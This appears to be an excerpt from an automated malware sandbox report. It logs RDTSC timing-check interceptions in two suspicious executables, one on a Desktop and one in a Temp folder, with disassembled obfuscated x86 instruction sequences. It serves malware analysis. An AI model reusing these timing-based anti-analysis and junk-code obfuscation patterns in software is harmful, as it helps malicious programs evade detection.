Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 54C034B second address: 54C0360 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC3507E5381h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 54C0360 second address: 54C0370 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FC350C3E71Ch 0x00000009 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 54C0370 second address: 54C03C2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 add dword ptr [esp], 4911E002h 0x0000000f pushad 0x00000010 mov si, dx 0x00000013 mov di, 710Ch 0x00000017 popad 0x00000018 call 00007FC3507E5379h 0x0000001d pushad 0x0000001e pushfd 0x0000001f jmp 00007FC3507E5381h 0x00000024 xor si, 47E6h 0x00000029 jmp 00007FC3507E5381h 0x0000002e popfd 0x0000002f push eax 0x00000030 push edx 0x00000031 mov ecx, 101127EDh 0x00000036 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 54C03C2 second address: 54C0401 instructions: 0x00000000 rdtsc 0x00000002 mov edx, eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 jmp 00007FC350C3E71Fh 0x0000000d mov eax, dword ptr [esp+04h] 0x00000011 pushad 0x00000012 movsx ebx, si 0x00000015 movzx ecx, dx 0x00000018 popad 0x00000019 mov eax, dword ptr [eax] 0x0000001b pushad 0x0000001c push eax 0x0000001d push edx 0x0000001e call 00007FC350C3E726h 0x00000023 pop ecx 0x00000024 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 54C0401 second address: 54C0415 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 call 00007FC3507E537Eh 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 54C0415 second address: 54C0428 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 popad 0x00000006 mov dword ptr [esp+04h], eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d mov esi, ebx 0x0000000f mov ax, dx 0x00000012 popad 0x00000013 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 54C0428 second address: 54C0520 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movzx ecx, dx 0x00000006 mov edi, 4F3B3A8Eh 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e pop eax 0x0000000f pushad 0x00000010 mov edx, 7A580D66h 0x00000015 pushfd 0x00000016 jmp 00007FC3507E5387h 0x0000001b add eax, 111B17EEh 0x00000021 jmp 00007FC3507E5389h 0x00000026 popfd 0x00000027 popad 0x00000028 mov eax, dword ptr fs:[00000000h] 0x0000002e jmp 00007FC3507E537Eh 0x00000033 nop 0x00000034 jmp 00007FC3507E5380h 0x00000039 push eax 0x0000003a pushad 0x0000003b pushfd 0x0000003c jmp 00007FC3507E5381h 0x00000041 and ax, 1986h 0x00000046 jmp 00007FC3507E5381h 0x0000004b popfd 0x0000004c push ecx 0x0000004d pushfd 0x0000004e jmp 00007FC3507E5387h 0x00000053 sbb eax, 33FE58BEh 0x00000059 jmp 00007FC3507E5389h 0x0000005e popfd 0x0000005f pop ecx 0x00000060 popad 0x00000061 nop 0x00000062 push eax 0x00000063 push edx 0x00000064 pushad 0x00000065 jmp 00007FC3507E5388h 0x0000006a pushad 0x0000006b popad 0x0000006c popad 0x0000006d rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 54C0520 second address: 54C054D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC350C3E721h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 sub esp, 1Ch 0x0000000c jmp 00007FC350C3E71Eh 0x00000011 xchg eax, ebx 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 54C054D second address: 54C0551 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 54C0551 second address: 54C056E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC350C3E729h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 54C056E second address: 54C05B6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FC3507E5387h 0x00000009 and eax, 5028C2EEh 0x0000000f jmp 00007FC3507E5389h 0x00000014 popfd 0x00000015 push eax 0x00000016 pop edx 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a push eax 0x0000001b pushad 0x0000001c push eax 0x0000001d push edx 0x0000001e mov bx, F27Ch 0x00000022 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 54C05B6 second address: 54C05D7 instructions: 0x00000000 rdtsc 0x00000002 call 00007FC350C3E725h 0x00000007 pop eax 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c mov edi, 48157D62h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 54C05D7 second address: 54C061D instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007FC3507E5383h 0x00000008 add ch, 0000005Eh 0x0000000b jmp 00007FC3507E5389h 0x00000010 popfd 0x00000011 pop edx 0x00000012 pop eax 0x00000013 popad 0x00000014 xchg eax, ebx 0x00000015 push eax 0x00000016 push edx 0x00000017 jmp 00007FC3507E537Dh 0x0000001c rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 54C061D second address: 54C0684 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC350C3E721h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, esi 0x0000000a jmp 00007FC350C3E71Eh 0x0000000f push eax 0x00000010 pushad 0x00000011 call 00007FC350C3E721h 0x00000016 pushfd 0x00000017 jmp 00007FC350C3E720h 0x0000001c adc si, 5718h 0x00000021 jmp 00007FC350C3E71Bh 0x00000026 popfd 0x00000027 pop esi 0x00000028 mov ebx, 1B8CF05Ch 0x0000002d popad 0x0000002e xchg eax, esi 0x0000002f push eax 0x00000030 push edx 0x00000031 push eax 0x00000032 push edx 0x00000033 push eax 0x00000034 push edx 0x00000035 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 54C0684 second address: 54C0688 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 54C0688 second address: 54C068E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 54C068E second address: 54C0694 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 54C0694 second address: 54C0717 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC350C3E721h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, edi 0x0000000c pushad 0x0000000d pushfd 0x0000000e jmp 00007FC350C3E71Ch 0x00000013 adc cx, DBD8h 0x00000018 jmp 00007FC350C3E71Bh 0x0000001d popfd 0x0000001e pushfd 0x0000001f jmp 00007FC350C3E728h 0x00000024 xor cx, 2638h 0x00000029 jmp 00007FC350C3E71Bh 0x0000002e popfd 0x0000002f popad 0x00000030 push eax 0x00000031 jmp 00007FC350C3E729h 0x00000036 xchg eax, edi 0x00000037 push eax 0x00000038 push edx 0x00000039 push eax 0x0000003a push edx 0x0000003b push eax 0x0000003c push edx 0x0000003d rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 54C0717 second address: 54C071B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 54C071B second address: 54C071F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 54C071F second address: 54C0725 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 54C0725 second address: 54C072B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 54C072B second address: 54C072F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 54C072F second address: 54C07D9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [7732B370h] 0x0000000d pushad 0x0000000e call 00007FC350C3E726h 0x00000013 pushfd 0x00000014 jmp 00007FC350C3E722h 0x00000019 and ecx, 47072558h 0x0000001f jmp 00007FC350C3E71Bh 0x00000024 popfd 0x00000025 pop eax 0x00000026 push edi 0x00000027 mov si, 182Bh 0x0000002b pop eax 0x0000002c popad 0x0000002d xor dword ptr [ebp-08h], eax 0x00000030 pushad 0x00000031 pushfd 0x00000032 jmp 00007FC350C3E71Dh 0x00000037 and si, 58F6h 0x0000003c jmp 00007FC350C3E721h 0x00000041 popfd 0x00000042 movzx eax, di 0x00000045 popad 0x00000046 xor eax, ebp 0x00000048 jmp 00007FC350C3E728h 0x0000004d nop 0x0000004e pushad 0x0000004f pushad 0x00000050 call 00007FC350C3E71Ch 0x00000055 pop eax 0x00000056 push eax 0x00000057 push edx 0x00000058 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 54C07D9 second address: 54C0838 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushfd 0x00000006 jmp 00007FC3507E5381h 0x0000000b and ecx, 233FAE66h 0x00000011 jmp 00007FC3507E5381h 0x00000016 popfd 0x00000017 popad 0x00000018 push eax 0x00000019 jmp 00007FC3507E5381h 0x0000001e nop 0x0000001f push eax 0x00000020 push edx 0x00000021 push eax 0x00000022 push edx 0x00000023 jmp 00007FC3507E5388h 0x00000028 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 54C0838 second address: 54C083E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 54C083E second address: 54C086C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC3507E537Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 lea eax, dword ptr [ebp-10h] 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FC3507E5387h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 54C086C second address: 54C08BE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FC350C3E71Fh 0x00000009 and ax, 510Eh 0x0000000e jmp 00007FC350C3E729h 0x00000013 popfd 0x00000014 popad 0x00000015 pop edx 0x00000016 pop eax 0x00000017 mov dword ptr fs:[00000000h], eax 0x0000001d pushad 0x0000001e pushad 0x0000001f mov dx, 8D9Ch 0x00000023 pushad 0x00000024 popad 0x00000025 popad 0x00000026 mov di, DD46h 0x0000002a popad 0x0000002b mov esi, dword ptr [ebp+08h] 0x0000002e push eax 0x0000002f push edx 0x00000030 push eax 0x00000031 push edx 0x00000032 push eax 0x00000033 push edx 0x00000034 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 54C08BE second address: 54C08C2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 54C08C2 second address: 54C08C6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 54C08C6 second address: 54C08CC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 54C08CC second address: 54C08DC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FC350C3E71Ch 0x00000009 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 54C08DC second address: 54C0904 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC3507E537Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov eax, dword ptr [esi+10h] 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007FC3507E5380h 0x00000017 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 54C0904 second address: 54C0908 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 54C0908 second address: 54C090E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 54C090E second address: 54C09A2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC350C3E71Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 test eax, eax 0x0000000b pushad 0x0000000c mov ebx, 4C08AD90h 0x00000011 popad 0x00000012 jne 00007FC3C29ADB11h 0x00000018 pushad 0x00000019 pushad 0x0000001a push edi 0x0000001b pop esi 0x0000001c pushfd 0x0000001d jmp 00007FC350C3E727h 0x00000022 adc al, FFFFFFEEh 0x00000025 jmp 00007FC350C3E729h 0x0000002a popfd 0x0000002b popad 0x0000002c pushfd 0x0000002d jmp 00007FC350C3E720h 0x00000032 xor ax, 3368h 0x00000037 jmp 00007FC350C3E71Bh 0x0000003c popfd 0x0000003d popad 0x0000003e sub eax, eax 0x00000040 push eax 0x00000041 push edx 0x00000042 jmp 00007FC350C3E722h 0x00000047 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 54C09A2 second address: 54C09F4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FC3507E5381h 0x00000009 sbb ecx, 00B61C36h 0x0000000f jmp 00007FC3507E5381h 0x00000014 popfd 0x00000015 call 00007FC3507E5380h 0x0000001a pop esi 0x0000001b popad 0x0000001c pop edx 0x0000001d pop eax 0x0000001e mov dword ptr [ebp-20h], eax 0x00000021 push eax 0x00000022 push edx 0x00000023 jmp 00007FC3507E537Ch 0x00000028 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 54C09F4 second address: 54C09FA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 54C09FA second address: 54C09FE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 54C09FE second address: 54C0A56 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ebx, dword ptr [esi] 0x0000000a pushad 0x0000000b mov ax, di 0x0000000e pushad 0x0000000f movsx edi, ax 0x00000012 movzx esi, di 0x00000015 popad 0x00000016 popad 0x00000017 mov dword ptr [ebp-24h], ebx 0x0000001a pushad 0x0000001b mov dx, 01A6h 0x0000001f call 00007FC350C3E727h 0x00000024 mov ah, 5Bh 0x00000026 pop ebx 0x00000027 popad 0x00000028 test ebx, ebx 0x0000002a pushad 0x0000002b mov edx, esi 0x0000002d mov esi, 083ACC19h 0x00000032 popad 0x00000033 je 00007FC3C29AD950h 0x00000039 push eax 0x0000003a push edx 0x0000003b jmp 00007FC350C3E71Bh 0x00000040 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 54C0A56 second address: 54C0ACC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC3507E5389h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 cmp ebx, FFFFFFFFh 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f pushfd 0x00000010 jmp 00007FC3507E5383h 0x00000015 jmp 00007FC3507E5383h 0x0000001a popfd 0x0000001b pushfd 0x0000001c jmp 00007FC3507E5388h 0x00000021 sub si, D998h 0x00000026 jmp 00007FC3507E537Bh 0x0000002b popfd 0x0000002c popad 0x0000002d rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 54C0ACC second address: 54C0AD2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 54B0D86 second address: 54B0D95 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC3507E537Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 54B0D95 second address: 54B0DC7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FC350C3E722h 0x00000009 sub ecx, 312797B8h 0x0000000f jmp 00007FC350C3E71Bh 0x00000014 popfd 0x00000015 popad 0x00000016 pop edx 0x00000017 pop eax 0x00000018 pop ebp 0x00000019 pushad 0x0000001a push eax 0x0000001b push edx 0x0000001c mov dx, ax 0x0000001f rdtsc
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	RDTSC instruction interceptor: First address: 6EF293 second address: 6EF299 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	RDTSC instruction interceptor: First address: 6EF299 second address: 6EF29E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	RDTSC instruction interceptor: First address: 867689 second address: 86769D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FC3507E5380h 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	RDTSC instruction interceptor: First address: 867960 second address: 867966 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	RDTSC instruction interceptor: First address: 867966 second address: 867974 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jng 00007FC3507E5376h 0x0000000e rdtsc
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	RDTSC instruction interceptor: First address: 867AB8 second address: 867AD3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC350C3E727h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	RDTSC instruction interceptor: First address: 86AE02 second address: 86AE08 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	RDTSC instruction interceptor: First address: 86AF67 second address: 86AF7F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 jmp 00007FC350C3E71Bh 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push eax 0x0000000d pushad 0x0000000e push edi 0x0000000f pop edi 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	RDTSC instruction interceptor: First address: 86B0B0 second address: 86B0B4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	RDTSC instruction interceptor: First address: 86B14D second address: 86B157 instructions: 0x00000000 rdtsc 0x00000002 ja 00007FC350C3E716h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	RDTSC instruction interceptor: First address: 86B157 second address: 86B15D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	RDTSC instruction interceptor: First address: 853688 second address: 85368C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	RDTSC instruction interceptor: First address: 85368C second address: 85369D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 je 00007FC3507E5376h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push esi 0x0000000d push eax 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	RDTSC instruction interceptor: First address: 888751 second address: 88875D instructions: 0x00000000 rdtsc 0x00000002 jl 00007FC350C3E716h 0x00000008 push eax 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	RDTSC instruction interceptor: First address: 888890 second address: 888896 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	RDTSC instruction interceptor: First address: 888896 second address: 8888A9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 jg 00007FC350C3E716h 0x0000000d jnc 00007FC350C3E716h 0x00000013 rdtsc
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	RDTSC instruction interceptor: First address: 8889FE second address: 888A0F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FC3507E537Dh 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	RDTSC instruction interceptor: First address: 888A0F second address: 888A13 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	RDTSC instruction interceptor: First address: 888A13 second address: 888A1C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	RDTSC instruction interceptor: First address: 888CE4 second address: 888CE8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	RDTSC instruction interceptor: First address: 888DFA second address: 888E06 instructions: 0x00000000 rdtsc 0x00000002 jo 00007FC3507E5376h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	RDTSC instruction interceptor: First address: 888E06 second address: 888E4A instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 jno 00007FC350C3E716h 0x00000009 jmp 00007FC350C3E71Eh 0x0000000e pop esi 0x0000000f jc 00007FC350C3E71Ch 0x00000015 pop edx 0x00000016 pop eax 0x00000017 pushad 0x00000018 push eax 0x00000019 push edx 0x0000001a push edi 0x0000001b pop edi 0x0000001c jmp 00007FC350C3E729h 0x00000021 rdtsc
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	RDTSC instruction interceptor: First address: 888E4A second address: 888EA8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC3507E5389h 0x00000007 jmp 00007FC3507E5384h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e pushad 0x0000000f jmp 00007FC3507E537Ah 0x00000014 jmp 00007FC3507E537Fh 0x00000019 popad 0x0000001a jns 00007FC3507E537Eh 0x00000020 push eax 0x00000021 push edx 0x00000022 push eax 0x00000023 push edx 0x00000024 rdtsc
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	RDTSC instruction interceptor: First address: 888EA8 second address: 888EAE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	RDTSC instruction interceptor: First address: 888EAE second address: 888EB2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	RDTSC instruction interceptor: First address: 8891B1 second address: 8891C2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC350C3E71Dh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	RDTSC instruction interceptor: First address: 889362 second address: 889392 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FC3507E5388h 0x00000008 jo 00007FC3507E5376h 0x0000000e jnl 00007FC3507E5376h 0x00000014 popad 0x00000015 push eax 0x00000016 push edx 0x00000017 jg 00007FC3507E5376h 0x0000001d rdtsc
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	RDTSC instruction interceptor: First address: 889392 second address: 889396 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	RDTSC instruction interceptor: First address: 88A460 second address: 88A466 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	RDTSC instruction interceptor: First address: 88A466 second address: 88A46C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	RDTSC instruction interceptor: First address: 88DB4C second address: 88DB50 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	RDTSC instruction interceptor: First address: 88DB50 second address: 88DB5C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop eax 0x00000007 push eax 0x00000008 push edi 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
